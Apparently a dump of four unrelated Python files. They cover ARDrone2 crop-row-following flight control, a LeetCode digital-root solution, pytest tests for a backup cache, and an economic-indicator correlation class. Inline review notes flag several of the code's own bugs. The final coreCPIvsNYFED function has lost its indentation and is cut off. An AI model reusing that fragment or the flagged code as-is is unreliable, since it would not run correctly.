            if g_img.shape[0] != h or g_img.shape[1] != w:
                print g_img.shape, (w,h)
                g_img = np.zeros([h,w,3], dtype=np.uint8)
            ret = cvideo.frame( g_img, isIFrame(header) and 1 or 0, payload )
            frame = g_img
            assert ret
            if ret:
                result = processAvoidGreen( frame, debug=False )
                # NOTE(review): returns on the first decoded I-frame,
                # discarding any further frames still buffered in g_pave --
                # confirm that is intended.
                return (frameNumber( header ), timestamp(header)), result
        header,payload = g_pave.extract()
# Cross-process queue carrying vision results from the video child process.
g_queueResults = multiprocessing.Queue()

def getOrNone():
    """Return the next queued vision result, or None when nothing is pending."""
    return None if g_queueResults.empty() else g_queueResults.get()
###### --------------------------------------------------------------------------
# TODO for bottom cammera (!)
def project2plane( imgCoord, coord, height, heading, angleFB, angleLR ):
    """Project a front-camera pixel (1280x720) onto the ground plane.

    Returns world (x, y) of the projected point, or None when the viewing
    ray does not intersect the ground in front of the drone."""
    FOW = math.radians(70)  # horizontal field of view of the camera
    EPS = 0.0001
    # center the image coordinates; py axis points up
    px, py = imgCoord[0]-1280/2, 720/2-imgCoord[1]
    # undo the drone roll by rotating the pixel around the image center
    roll = -angleLR
    px, py = (px*math.cos(roll) - py*math.sin(roll),
              py*math.cos(roll) + px*math.sin(roll))
    # bearing and tilt of the viewing ray
    h = heading - px/1280*FOW
    tilt = py/1280*FOW + angleFB
    if tilt > -EPS:
        # ray is (nearly) horizontal or points above the horizon
        return None
    dist = height/math.tan(-tilt)
    return (coord[0] + math.cos(h)*dist, coord[1] + math.sin(h)*dist)
class FieldRobotDrone( ARDrone2 ):
    """ARDrone2 wired to the green-row vision pipeline (Field Robot Event)."""
    def __init__( self, replayLog=None, speed = 0.2, skipConfigure=False, metaLog=None, console=None ):
        # callable returning the latest logged vision result (or None)
        self.loggedVideoResult = None
        # most recent ((frameNumber, timestamp), detection) from the pipeline
        self.lastImageResult = None
        self.videoHighResolution = False
        ARDrone2.__init__( self, replayLog, speed, skipConfigure, metaLog, console )
        if replayLog == None:
            # live run: log processed video results to a timestamped file
            name = timeName( "logs/src_cv2_", "log" )
            metaLog.write("cv2: "+name+'\n' )
            self.loggedVideoResult = SourceLogger( getOrNone, name ).get
            self.startVideo( wrapper, g_queueResults, record=True, highResolution=self.videoHighResolution )
        else:
            # replay: read previously logged vision results instead of decoding
            assert metaLog
            self.loggedVideoResult = SourceLogger( None, metaLog.getLog("cv2:") ).get
            self.startVideo( record=True, highResolution=self.videoHighResolution )
    def update( self, cmd="AT*COMWDG=%i,\r" ):
        """Refresh navdata, then poll the vision pipeline for a new result."""
        ARDrone2.update( self, cmd )
        if self.loggedVideoResult != None:
            self.lastImageResult = self.loggedVideoResult()
def stayAtPosition( drone, desiredHeight = 1.5, timeout = 10.0 ):
    """Hover above a detected roundel tag, stepping through a small square
    search pattern while no tag is visible. Returns the maximum gap (s)
    observed between two control updates."""
    maxControlGap = 0.0
    desiredSpeed = MAX_ALLOWED_SPEED
    refPoint = (0,0)
    foundTagTime = None
    # relative waypoints for the square search pattern (world offsets)
    searchSeq = [(0,0), (2,0), (0,-2), (-2,0), (0,2), (0,0)]
    startTime = drone.time
    sx,sy,sz,sa = 0,0,0,0
    stepTime = drone.time
    while drone.time < startTime + timeout:
        # --- altitude estimate: average of vision and sonar altimeters ---
        altitude = desiredHeight
        if drone.altitudeData != None:
            altVision = drone.altitudeData[0]/1000.0
            altSonar = drone.altitudeData[3]/1000.0
            altitude = (altSonar+altVision)/2.0
            # TODO selection based on history? panic when min/max too far??
            if abs(altSonar-altVision) > 0.5:
                print altSonar, altVision
                altitude = max( altSonar, altVision ) # sonar is 0.0 sometimes (no ECHO)
        # vertical speed command, clamped harder when near desired height
        sz = max( -0.2, min( 0.2, desiredHeight - altitude ))
        if altitude > 2.5:
            # wind and "out of control"
            sz = max( -0.5, min( 0.5, desiredHeight - altitude ))
        sx = 0.0 #max( 0, min( drone.speed, desiredSpeed - drone.vx ))
#        tiltCompensation = Pose(desiredHeight*oldAngles[0], desiredHeight*oldAngles[1], 0) # TODO real height?
#        print "FRAME", frameNumber/15, "[%.1f %.1f]" % (math.degrees(oldAngles[0]), math.degrees(oldAngles[1])),
#        if drone.battery < 10:
#            print "BATTERY LOW!", drone.battery
        # error definition ... if you substract that you get desired position or angle
        # error is taken from the path point of view, x-path direction, y-positive left, angle-anticlockwise
        errX, errY, errA = 0.0, 0.0, 0.0
#        if refLine:
#            errY = refLine.signedDistance( drone.coord )
#            errA = normalizeAnglePIPI( drone.heading - refLine.angle )
        if len(drone.visionTag) > 0:
            # tag seen: compute its world position, compensating drone tilt
            SCALE = 0.17/(2*74)
            tagX, tagY, tagDist = drone.visionTag[0][0], drone.visionTag[0][1], drone.visionTag[0][4]/100.0
            tiltCompensation = Pose(tagDist*drone.angleFB, tagDist*drone.angleLR, 0)
            pose = Pose(drone.coord[0], drone.coord[1], drone.heading).add(tiltCompensation)
            offset = Pose(tagDist*(480-tagY)*SCALE, tagDist*(tagX-640)*SCALE, 0.0)
            pose = pose.add( offset )
            refPoint = (pose.x, pose.y)
            if foundTagTime == None:
                print drone.visionTag
                print "%.2f\t%.2f\t%.2f\t%.1f\t%.1f" % (drone.time, tagDist*(tagY-480)*SCALE, tagDist*(tagX-640)*SCALE, math.degrees(drone.angleFB), math.degrees(drone.angleLR))
                print refPoint
            foundTagTime = drone.time
        else:
            # tag lost for more than 3 s -> restart the search pattern here
            if foundTagTime != None and drone.time - foundTagTime > 3.0:
                foundTagTime = None
                print "LOST TAG"
                searchSeq = [(x+drone.coord[0], y+drone.coord[1]) for (x,y) in [(0,0), (2,0), (0,-2), (-2,0), (0,2), (0,0)]]
        # advance to the next search waypoint every 3 s while no tag is seen
        if foundTagTime == None and len(searchSeq) > 0 and drone.time - stepTime > 3.0:
            refPoint = searchSeq[0]
            searchSeq = searchSeq[1:]
            print "STEP", refPoint
            stepTime = drone.time
        if refPoint:
            pose = Pose(drone.coord[0], drone.coord[1], drone.heading)
            landPose = Pose( refPoint[0], refPoint[1], drone.heading ) # ignore heading for the moment
            diff = pose.sub( landPose )
            #print diff
            errX, errY = diff.x, diff.y
        # get the height first
#        if drone.coord[2] < desiredHeight - 0.1 and drone.time-startTime < 5.0:
#            sx = 0.0
        # error correction
        # the goal is to have errY and errA zero in 1 second -> errY defines desired speed at given distance from path
        sx = max( -0.2, min( 0.2, -errX-drone.vx ))/2.0
        sy = max( -0.2, min( 0.2, -errY-drone.vy ))/2.0
        # there is no drone.va (i.e. derivative of heading) available at the moment ...
        sa = max( -0.1, min( 0.1, -errA/2.0 ))*1.35*(desiredSpeed/0.4) # originally set for 0.4=OK
#        print "%0.2f\t%d\t%0.2f\t%0.2f\t%0.2f" % (errY, int(math.degrees(errA)), drone.vy, sy, sa)
        prevTime = drone.time
        drone.moveXYZA( sx, sy, sz, sa )
        maxControlGap = max( drone.time - prevTime, maxControlGap )
    return maxControlGap
# Python 2 tuple-parameter syntax: takes the row's top and bottom image
# points plus a meters-per-pixel scale; returns the row Pose relative to
# the image center (360x640 bottom camera frame).
def groundPose( (x,y), (xBottom,yBottom), scale ):
    # heading of the row from the top->bottom point direction
    a = math.atan2( xBottom-x, yBottom-y )
    return Pose( scale*(360/2-y), scale*(640/2-x), a )
def evalRowData( rowTopBottom ):
    """Validate detected row borders ((topL, topR), (botL, botR)).

    Returns (topCenter, bottomCenter) x-coordinates when the borders lie
    inside the 640-wide image and both widths fall in (150, 350);
    otherwise returns None."""
    (topL, topR), (botL, botR) = rowTopBottom
    # reject rows touching the image border
    if min(topL, botL) <= 0 or max(topR, botR) >= 640:
        return None
    widthTop, widthBottom = topR - topL, botR - botL
    # reject implausibly narrow or wide rows
    if min(widthTop, widthBottom) <= 150 or max(widthTop, widthBottom) >= 350:
        return None
    return (topL + topR)/2, (botL + botR)/2
def followRow( drone, desiredHeight = 1.5, timeout = 10.0 ):
    """Fly along a vision-detected crop row for up to `timeout` seconds,
    fitting a reference line from each valid detection and steering to
    keep distance and heading error near zero. Returns the maximum gap (s)
    between two control updates."""
    maxControlGap = 0.0
    maxVideoDelay = 0.0
    desiredSpeed = MAX_ALLOWED_SPEED
    startTime = drone.time
    sx,sy,sz,sa = 0,0,0,0
    lastUpdate = None
    refLine = None
    while drone.time < startTime + timeout:
        # --- altitude estimate: average of vision and sonar altimeters ---
        altitude = desiredHeight
        if drone.altitudeData != None:
            altVision = drone.altitudeData[0]/1000.0
            altSonar = drone.altitudeData[3]/1000.0
            altitude = (altSonar+altVision)/2.0
            # TODO selection based on history? panic when min/max too far??
            if abs(altSonar-altVision) > 0.5:
#                print altSonar, altVision
                altitude = max( altSonar, altVision ) # sonar is 0.0 sometimes (no ECHO)
        sz = max( -0.2, min( 0.2, desiredHeight - altitude ))
        if altitude > 2.5:
            # wind and "out of control"
            sz = max( -0.5, min( 0.5, desiredHeight - altitude ))
        if drone.lastImageResult:
            lastUpdate = drone.time
            assert len( drone.lastImageResult ) == 2 and len( drone.lastImageResult[0] ) == 2, drone.lastImageResult
            (frameNumber, timestamp), rowTopBottom = drone.lastImageResult
            viewlog.dumpVideoFrame( frameNumber, timestamp )
            # keep history small
            videoTime = correctTimePeriod( timestamp/1000., ref=drone.time )
            videoDelay = drone.time - videoTime
            if videoDelay > 1.0:
                print "!DANGER! - video delay", videoDelay
            maxVideoDelay = max( videoDelay, maxVideoDelay )
            # drop pose-history entries older than the video frame
            toDel = 0
            for oldTime, oldPose, oldAngles in drone.poseHistory:
                toDel += 1
                if oldTime >= videoTime:
                    break
            drone.poseHistory = drone.poseHistory[:toDel]
            # NOTE(review): oldPose/oldAngles come from the loop above; if
            # poseHistory is empty they are unbound and the next line raises
            # NameError -- confirm callers always seed drone.poseHistory.
            tiltCompensation = Pose(desiredHeight*oldAngles[0], desiredHeight*oldAngles[1], 0) # TODO real height?
            validRow = evalRowData( rowTopBottom )
            print "FRAME", frameNumber/15, "[%.1f %.1f]" % (math.degrees(oldAngles[0]), math.degrees(oldAngles[1])), validRow
            if validRow:
                # fit the reference line through the row pose at frame time
                sp = groundPose( *rowTopBottom, scale=ROW_WIDTH/((validRow[0]+validRow[1])/2.0))
                sPose = Pose( *oldPose ).add(tiltCompensation).add( sp )
                refLine = Line( (sPose.x,sPose.y), (sPose.x + math.cos(sPose.heading), sPose.y + math.sin(sPose.heading)) )
        # steering errors relative to the current reference line
        errY, errA = 0.0, 0.0
        if refLine:
            errY = refLine.signedDistance( drone.coord )
            errA = normalizeAnglePIPI( drone.heading - refLine.angle )
        sx = max( 0, min( drone.speed, desiredSpeed - drone.vx ))
        sy = max( -0.2, min( 0.2, -errY-drone.vy ))/2.0
        sa = max( -0.1, min( 0.1, -errA/2.0 ))*1.35*(desiredSpeed/0.4)
        prevTime = drone.time
        drone.moveXYZA( sx, sy, sz, sa )
        drone.poseHistory.append( (drone.time, (drone.coord[0], drone.coord[1], drone.heading), (drone.angleFB, drone.angleLR)) )
        maxControlGap = max( drone.time - prevTime, maxControlGap )
    return maxControlGap
def competeFieldRobot( drone, desiredHeight = 1.5 ):
    """Competition entry point: take off, follow the crop row with the
    bottom camera for 25 s, then land. Manual override triggers a safe
    hover-and-land."""
    drone.speed = 0.1
    maxVideoDelay = 0.0
    maxControlGap = 0.0
    try:
        drone.wait(1.0)
        # bottom camera is used for row detection
        drone.setVideoChannel( front=False )
        drone.takeoff()
        drone.poseHistory = []
        print "NAVI-ON"
        startTime = drone.time
#        maxControlGap = stayAtPosition( drone, desiredHeight=desiredHeight, timeout=30.0 )
        maxControlGap = followRow( drone, desiredHeight=desiredHeight, timeout=25.0 )
        lastUpdate = None
        print "NAVI-OFF", drone.time - startTime
        drone.hover(0.5)
        drone.land()
        drone.setVideoChannel( front=True )
    except ManualControlException, e:
        # operator took over: stop any motion, then land
        print "ManualControlException"
        if drone.ctrlState == 3: # CTRL_FLYING=3 ... i.e. stop the current motion
            drone.hover(0.1)
        drone.land()
    drone.wait(1.0)
    drone.stopVideo()
#    print "MaxVideoDelay", maxVideoDelay
    print "MaxControlGap", maxControlGap
    print "Battery", drone.battery
if __name__ == "__main__":
    # NOTE(review): imgmain and processFrame are not defined or imported in
    # this file (the rr_drone import above is commented out), so the "img"
    # branch would raise NameError -- confirm before using that mode.
    if len(sys.argv) > 2 and sys.argv[1] == "img":
        imgmain( sys.argv[1:], processFrame )
        sys.exit( 0 )
    import launcher
    launcher.launch( sys.argv, FieldRobotDrone, competeFieldRobot )
|
# -*- coding: utf-8 -*-
'''
https://leetcode.com/problems/add-digits/
'''
class Solution(object):
    def addDigits(self, num):
        """
        Repeatedly sum the decimal digits of num until a single digit
        remains (the digital root).

        :type num: int
        :rtype: int
        """
        # Closed form: for num != 0 the digital root is 1 + (num - 1) % 9,
        # which matches num % 9 with the 0 -> 9 substitution; 0 maps to 0.
        if not num:
            return 0
        return 1 + (num - 1) % 9
|
import os
import pytest
from twindb_backup.cache.cache import Cache, CacheException
def test_init_raises_exception():
    """Cache must raise CacheException for a path that does not exist."""
    with pytest.raises(CacheException):
        Cache('foo')
def test_in(cache_dir):
    """Membership mirrors which subdirectories exist in the cache dir."""
    cache = Cache(str(cache_dir))
    assert 'bar' not in cache
    cache_dir.mkdir('foo')
    assert 'foo' in cache
def test_add(cache_dir, tmpdir):
    """add() stores a directory under its basename by default."""
    cache = Cache(str(cache_dir))
    src = str(tmpdir.mkdir('foo'))
    assert src not in cache
    cache.add(src)
    assert 'foo' in cache
def test_add_with_key(cache_dir, tmpdir):
    """add() stores a directory under an explicit key when one is given."""
    cache = Cache(str(cache_dir))
    src = str(tmpdir.mkdir('foo'))
    assert src not in cache
    cache.add(src, 'bar')
    assert 'bar' in cache
def test_purge(cache_dir):
    """purge() empties the cache but keeps the cache directory itself."""
    cache = Cache(str(cache_dir))
    cache_dir.mkdir('foo')
    cache_dir.mkdir('bar')
    assert 'foo' in cache
    assert 'bar' in cache
    print(os.listdir(str(cache_dir)))
    cache.purge()
    assert 'foo' not in cache
    assert 'bar' not in cache
    assert os.path.exists(str(cache_dir))
def test_restore_in(cache_dir, tmpdir):
    """restore_in() copies a cached item's files and subdirs into dst."""
    cache = Cache(str(cache_dir))
    src = tmpdir.mkdir('foo')
    datafile = src.join('ibdata1')
    datafile.write('content')
    assert os.path.exists(str(datafile))
    subdir = src.mkdir('mysql')
    assert os.path.exists(str(subdir))
    cache.add(str(src))
    dst = str(tmpdir.mkdir('dst'))
    cache.restore_in('foo', dst)
    assert os.path.exists(os.path.join(dst, 'ibdata1'))
    assert os.path.exists(os.path.join(dst, 'mysql'))
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 20 23:05:15 2018
@author: Thomas Atta-Fosu (attafosu@yahoo.com)
"""
import pandas as pd
import datetime
import numpy as np
from matplotlib import pylab as plt
from matplotlib import dates as mdates
from dateutil import relativedelta
#%% Recession Months
# US recession windows keyed by (approximate) start year.
# Each value is (start date, end date) -- presumably the NBER peak/trough
# business-cycle dates; TODO confirm against the NBER chronology.
Recessions = {1949: (datetime.date(1948, 11, 30), datetime.date(1949, 10, 1)),
              1953: (datetime.date(1953, 7, 31), datetime.date(1954, 5, 1)),
              1958: (datetime.date(1957, 8, 31), datetime.date(1958, 4, 1)),
              1960: (datetime.date(1960, 4, 30), datetime.date(1961, 2, 1)),
              1969: (datetime.date(1969, 12, 31), datetime.date(1970, 11, 1)),
              1973: (datetime.date(1973, 11, 30), datetime.date(1975, 3, 1)),
              1980: (datetime.date(1980, 1, 31), datetime.date(1980, 7, 1)),
              1981: (datetime.date(1981, 7, 31), datetime.date(1982, 11, 1)),
              1990: (datetime.date(1990, 7, 31), datetime.date(1991, 3, 1)),
              2001: (datetime.date(2001, 3, 31), datetime.date(2001, 11, 1)),
              2007: (datetime.date(2007, 12, 31), datetime.date(2009, 6, 1))}
#%% Graph class
class DoubleLineGraphs:
    def __init__(self, data_path):
        """Load every indicator sheet from the Excel workbook at data_path
        into numpy arrays (rows of [date, value, ...])."""
        self.Recessions = Recessions  # module-level recession date table
        self.data = data_path
        xls = pd.ExcelFile(self.data)
        # try:
        #     xls = pd.ExcelFile(self.data)
        # except:
        #     print("Cannot open file. Make sure file exists")
        #     return
        #
        try:
            # NOTE(review): bare except hides unrelated failures; narrow it.
            self.LEI = xls.parse("LEI Year over Year Change").get_values()
        except:
            print("Spreadsheet does not have sheet named 'LEI Year over Year Change'. Cannot plot LEI graphs")
        # NOTE(review): DataFrame.get_values() is deprecated/removed in newer
        # pandas (.to_numpy() is the modern spelling) -- confirm pinned version.
        self.PMI = xls.parse('PMI',header=None).get_values()
        self.CC = xls.parse('Consumer Confidence',header=None).get_values() #Consumer Confidence
        self.CEOC = xls.parse('CEO Confidence',header=None).get_values() # CEO Confidence
        self.HBC = xls.parse('Home Builder Confidence',header=None).get_values()
        self.SBO = xls.parse('Small Business Optimism',header=None).get_values()
        self.HYS = xls.parse('HY Spreads',header=None).get_values()
        self.CPI = xls.parse('Core CPI',header=None).get_values()
        self.GDP = xls.parse('Real GDP YoY',header=None).get_values()
        self.NYFED = xls.parse('New York Fed Underlying Inf',header=None).get_values()
        self.CU = xls.parse('Capacity Utilization',header=None).get_values()
#%%
    def coreCPIvCapacityUtil(self, cpi_start_date=datetime.date(1998, 1,1),
                  cu_lag_months = 1):
        """Correlate Core CPI with Capacity Utilization shifted forward by
        16 months; stores aligned daily series and their correlation in
        self.res_cpi / self.res_cu / self.cpi_caputil_cor."""
        # NOTE(review): cu_lag_months only moves the CU *start* date; the
        # forward shift applied below is a hard-coded 16 months -- confirm
        # whether both were meant to use the parameter.
        cu_start_date = cpi_start_date - relativedelta.relativedelta(months=cu_lag_months)
        cu = {}
        cpi = {}
        for ss in range(self.CU.shape[0]):
            date = self.CU[ss,0]
            # skip non-date rows and dates before the window
            if not isinstance(date,datetime.date) or date.date() < cu_start_date:
                continue
            lag_date = date + relativedelta.relativedelta(months=16)
            cu[lag_date] = self.CU[self.CU[:,0]==date,1][0]
        for ss in range(self.CPI.shape[0]):
            date = self.CPI[ss,0]
            if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
                continue
            cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
        lcpi = sorted(cpi.items())
        lcu = sorted(cu.items())
        xcpi, ycpi = zip(*lcpi)
        xcu, ycu = zip(*lcu)
        self.xcpi , self.ycpi = xcpi, ycpi
        self.xcu, self.ycu = xcu, ycu
        # resample to daily resolution so the two series share an index
        ser_cpi = pd.Series(ycpi, index=xcpi)
        ser_cu = pd.Series(ycu, index=xcu)
        res_cpi = ser_cpi.resample('D').interpolate(method='linear')
        res_cu = ser_cu.resample('D').interpolate(method='linear')
        # clip both series to their overlapping date range
        start_date = max([min(res_cpi.index),min(res_cu.index)])
        end_date = min([max(res_cpi.index),max(res_cu.index)])
        self.res_cpi = res_cpi.loc[start_date:end_date]
        self.res_cu = res_cu.loc[start_date:end_date]
        # self.res_cpi.plot()
        self.cpi_caputil_cor = np.corrcoef(self.res_cpi, self.res_cu)
#%% CPI vs PMI
    def coreCPIvsISMPMI(self, cpi_start_date = datetime.date(1998, 1, 1), pmi_lag_months=21):
        """Correlate Core CPI with ISM PMI shifted forward 23 months, on the
        dates both series share; stores self.res_cpi / self.res_pmi and
        self.cpi_pmi_cor."""
        self.pmi = {}
        self.cpi = {}
        # NOTE(review): pmi_lag_months (21) sets the PMI start date but the
        # forward shift below is a hard-coded 23 months -- confirm intent.
        pmi_start_date = cpi_start_date - relativedelta.relativedelta(months=pmi_lag_months)
        for ss in range(self.PMI.shape[0]):
            date = self.PMI[ss,0]
            if not isinstance(date,datetime.date) or date.date() < pmi_start_date:
                continue
            lag_date = date + relativedelta.relativedelta(months=23)
            self.pmi[lag_date] = self.PMI[self.PMI[:,0]==date,1][0]
        for ss in range(self.CPI.shape[0]):
            date = self.CPI[ss,0]
            if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
                continue
            self.cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
        lcpi = sorted(self.cpi.items())
        lpmi = sorted(self.pmi.items())
        self.xcpi, self.ycpi = zip(*lcpi)
        self.xpmi, self.ypmi = zip(*lpmi)
        # align on the dates present in both series (no interpolation here)
        imdates = set(self.xcpi).intersection(self.xpmi)
        ser_cpi = pd.Series(self.ycpi, index=self.xcpi)
        ser_pmi = pd.Series(self.ypmi, index=self.xpmi)
        # res_cpi = ser_cpi.resample('3D').interpolate(method='linear')
        # res_pmi = ser_pmi.resample('3D').interpolate(method='linear')
        #
        # start_date = max([min(res_cpi.index),min(res_pmi.index)])
        # end_date = min([max(res_cpi.index),max(res_pmi.index)])
        self.res_cpi = ser_cpi.loc[imdates]
        self.res_pmi = ser_pmi.loc[imdates]
        # self.res_pmi.plot()
        self.cpi_pmi_cor = np.corrcoef(self.res_cpi, self.res_pmi)
#%%
    def confidenceScores(self,):
        """Build raw and z-scored series for the four confidence indices
        (consumer, CEO, home builder, small business) plus their means,
        keyed by date, in self.zcc/zceoc/zhbc/zsbo/zmeanconf."""
        ncc = {}
        nceoc = {}
        nhbc = {}
        nsbo = {}
        meanConf = {}
        self.zcc = {}
        self.zceoc = {}
        self.zhbc = {}
        self.zsbo = {}
        self.zmeanconf = {}
        for ss in range(self.CEOC.shape[0]):
            date = self.CEOC[ss,0]
            if not isinstance(date,datetime.date):
                continue
            cc = self.CC[self.CC[:,0]==date,1][0]
            # CEO confidence scaled by 10 -- presumably to match the other
            # indices' range; confirm the intended scaling.
            ceoc = 10*self.CEOC[self.CEOC[:,0]==date,1][0]
            hbc = self.HBC[self.HBC[:,0]==date,1][0]
            sbo = self.SBO[self.SBO[:,0]==date,1][0]
            meanConf[date] = np.mean(np.asarray([cc,ceoc,hbc,sbo]))
            ncc[date] = cc
            nceoc[date] = ceoc
            nhbc[date] = hbc
            nsbo[date] = sbo
        # second pass: z-score each series against its own full-sample
        # mean and standard deviation
        for date in ncc.keys():
            cc = (ncc[date] - np.mean(list(ncc.values())))/np.std(list(ncc.values()))
            ceoc = (nceoc[date] - np.mean(list(nceoc.values())))/np.std(list(nceoc.values()))
            hbc = (nhbc[date] - np.mean(list(nhbc.values())))/np.std(list(nhbc.values()))
            sbo = (nsbo[date] - np.mean(list(nsbo.values())))/np.std(list(nsbo.values()))
            self.zmeanconf[date] = np.mean(np.asarray([cc,ceoc,hbc,sbo]))
            self.zcc[date] = cc
            self.zceoc[date] = ceoc
            self.zhbc[date] = hbc
            self.zsbo[date] = sbo
#%%
    def HighYeildSpread(self, scope, data_end_date=datetime.date(2018, 4, 17)):
        """Collect high-yield spread values around the 2001 and 2007
        recession starts and for the recent pre-`data_end_date` window,
        keyed by day offset. (Method name typo kept: callers use it.)"""
        # scope ---> How far out to track (for High yield spreads, this is no. of days)
        # data_end_date ----> Latest month
        # trending_year_start_date = data_end_date.replace(year=data_end_date.year-1) # 1 year ago
        #print("data_end_date: {}".format(data_end_date))
        # current_1year_trend = {} # to store the preceding year's data
        self.HYscope = scope
        self.one_year_to_recession = {}
        self.six_mos_to_recession = {}
        self.recession_2001 = {}
        self.recession_2007 = {}
        for d in range(1,self.HYS.shape[0]):
            day = self.HYS[d,0]
            # skip numeric/header/non-date rows ('m/d/Y' strings expected)
            if isinstance(day,float):
                continue
            if 'Date' in day:
                continue
            if '/' not in day:
                continue
            #ymd = day.split('/')
            date = datetime.datetime.strptime(day,'%m/%d/%Y').date()#datetime.date(int(ymd[2]), int(ymd[0]), int(ymd[1]))
            # Saving past year trends
            if abs((Recessions[2001][0] - date).days) < scope:
                # within `scope` days of the 2001 recession start
                timediff2001 = (date - Recessions[2001][0]).days
                self.recession_2001[timediff2001] = self.HYS[self.HYS[:,0]==day, 1][0]
            elif abs((Recessions[2007][0] - date).days) < scope:
                timediff2007 = (date - Recessions[2007][0]).days
                self.recession_2007[timediff2007] = self.HYS[self.HYS[:,0]==day, 1][0]
            else:
                # recent history measured backwards from data_end_date
                timediff = (data_end_date - date).days
                if (timediff < scope) and (timediff > 120):
                    self.six_mos_to_recession[-timediff] = self.HYS[self.HYS[:,0]==day, 1][0]
                if (timediff <=365) and (timediff>120):
                    self.one_year_to_recession[-timediff] = self.HYS[self.HYS[:,0]==day, 1][0]
#%% Leading Economic Indicator
    def leadingEconomicIndicators(self,scope, trending_year=1):
        """Aggregate LEI values by month offset around each recession start
        (mean, 25th and 75th percentile per offset) and capture the most
        recent `trending_year`-long trend; results land in self.leimean,
        self.lei25, self.lei75, self.leicurr."""
        # scope ---> How far out to track
        # trending_year ---> current period in perspective
        months_to_and_after = dict((el, []) for el in range(-scope, scope+1, 1)) # To store the leadinng months
        end_date = datetime.datetime(1920,1,1,0,0) # To get end date
        for year in Recessions.keys():
            start_date = Recessions[year][0]
            for d in range(self.LEI.shape[0]):
                date = self.LEI[d,0]
                if not isinstance(date,datetime.date):
                    continue
                if abs((date.date() - start_date)).days <= (scope)*31:
                    # convert day offset to an approximate month offset
                    # (28-day months close to the start, 30-day farther out)
                    timediff = (date.date() - start_date).days
                    if abs(timediff)<155:
                        timediff = np.sign(timediff)*round((abs(timediff)/28))
                    else:
                        timediff = np.sign(timediff)*round((abs(timediff)/30))
                    # if timediff==0:
                    #     print(date)
                    val = self.LEI[self.LEI[:,0]==date, 1]
                    months_to_and_after[timediff].append( val[0] )
                if end_date < date:
                    end_date = date
        #%% Do some stats
        # stats are 25th percentile, mean and 75th percentile
        mean_vals = {}
        prctile_25 = {}
        prctile_75 = {}
        for lag_month in months_to_and_after.keys():
            vals = np.asarray(months_to_and_after[lag_month])
            mean_vals[lag_month] = np.mean(vals)
            prctile_25[lag_month] = np.percentile(vals, 25)
            prctile_75[lag_month] = np.percentile(vals, 75)
        #%% Current year trend stats
        data_end_date = end_date#self.LEI[self.LEI[:,0]=='End Date',1][0] # Get latest month
        trending_year_start_date = data_end_date.replace(year=data_end_date.year-trending_year) # tracking period ago
        current_1year_trend = {} # to store the preceding year's data
        for d in range(self.LEI.shape[0]):
            date = self.LEI[d,0]
            if not isinstance(date,datetime.date):
                continue
            # Saving past year trends
            if (date <= data_end_date) and (date >= trending_year_start_date):
                timediff = (data_end_date - date).days
                if timediff<155:
                    timediff = np.sign(timediff)*(abs(timediff)/28)
                else:
                    timediff = np.sign(timediff)*(abs(timediff)/30)
                # subtract 12 if you do
                current_1year_trend[-timediff-12] = self.LEI[self.LEI[:,0]==date, 1][0]
        self.leimean = sorted(mean_vals.items())
        self.lei25 = sorted(prctile_25.items())
        self.lei75 = sorted(prctile_75.items())
        self.leicurr = sorted(current_1year_trend.items())
#%% ISM PMI leading to recession
    def pmiLeadingToRecession(self, scope, trending_year=1):
        """Same aggregation as leadingEconomicIndicators but over ISM PMI;
        fills self.pmimean, self.pmi25, self.pmi75, self.pmicurr."""
        # scope ---> How far out to track
        # trending_year ----> current period in focus
        months_to_and_after = dict((el, []) for el in range(-scope, scope+1, 1)) # To store the leadinng months
        end_date = datetime.datetime(1920,1,1,0,0)
        for year in Recessions.keys():
            start_date = Recessions[year][0]
            for d in range(self.PMI.shape[0]):
                date = self.PMI[d,0]
                if not isinstance(date,datetime.date):
                    continue
                if abs((date.date() - start_date)).days <= (scope)*31:
                    # day offset -> approximate month offset (28/30-day months)
                    timediff = (date.date() - start_date).days
                    if abs(timediff)<155:
                        timediff = np.sign(timediff)*round((abs(timediff)/28))
                    else:
                        timediff = np.sign(timediff)*round((abs(timediff)/30))
                    # if timediff==0:
                    #     print(date)
                    val = self.PMI[self.PMI[:,0]==date, 1]
                    months_to_and_after[timediff].append( val[0] )
                if end_date < date:
                    end_date = date
        #%% Do some stats
        # stats are 25th percentile, mean and 75th percentile
        mean_vals = {}
        prctile_25 = {}
        prctile_75 = {}
        for lag_month in months_to_and_after.keys():
            vals = np.asarray(months_to_and_after[lag_month])
            mean_vals[lag_month] = np.mean(vals)
            prctile_25[lag_month] = np.percentile(vals, 25)
            prctile_75[lag_month] = np.percentile(vals, 75)
        #%% Current year trend stats
        data_end_date = end_date#self.PMI[self.PMI[:,0]=='End Date',1][0] # Get latest month
        # NOTE(review): trending_year parameter is unused here -- the window
        # below is hard-coded to 1 year (the LEI variant uses the parameter).
        trending_year_start_date = data_end_date.replace(year=data_end_date.year-1) # 1 year ago
        current_1year_trend = {} # to store the preceding year's data
        for d in range(self.PMI.shape[0]):
            date = self.PMI[d,0]
            if not isinstance(date,datetime.date):
                continue
            # Saving past year trends
            if (date <= data_end_date) and (date >= trending_year_start_date):
                timediff = (data_end_date - date).days
                if timediff<155:
                    timediff = np.sign(timediff)*(abs(timediff)/28)
                else:
                    timediff = np.sign(timediff)*(abs(timediff)/30)
                current_1year_trend[-timediff-12] = self.PMI[self.PMI[:,0]==date, 1][0]
        self.pmimean = sorted(mean_vals.items())
        self.pmi25 = sorted(prctile_25.items())
        self.pmi75 = sorted(prctile_75.items())
        self.pmicurr = sorted(current_1year_trend.items())
#%%
def coreCPIvsNYFED(self, cpi_start_date=datetime.date(1998, 1, 1), nyfed_lag_months=16):
nyfed_start_date = cpi_start_date - relativedelta.relativedelta(months=16)
nyfed = {}
cpi = {}
for ss in range(self.NYFED.shape[0]):
date = self.NYFED[ss,0]
if not isinstance(date,datetime.date) or date.date() < nyfed_start_date:
continue
lag_date = date + relativedelta.relativedelta(months=16)
nyfed[lag_date] = self.NYFED[self.NYFED[:,0]==date,1][0]
for ss in range(self.CPI.shape[0]):
date = self.CPI[ss,0]
if not isinstance(date, datetime.date) or date.date() < cpi_start_date:
continue
cpi[date] = self.CPI[self.CPI[:,0]==date,1][0]
self.lcpi = sorted(cpi.items())
self.lnyfed = sorted(nyfed.items())
xcpi, ycpi = zip(*self.lcpi)
xnyfed, ynyfed = zip(*self.lnyfed)
self.xcpi , self.ycpi = xcpi, ycpi
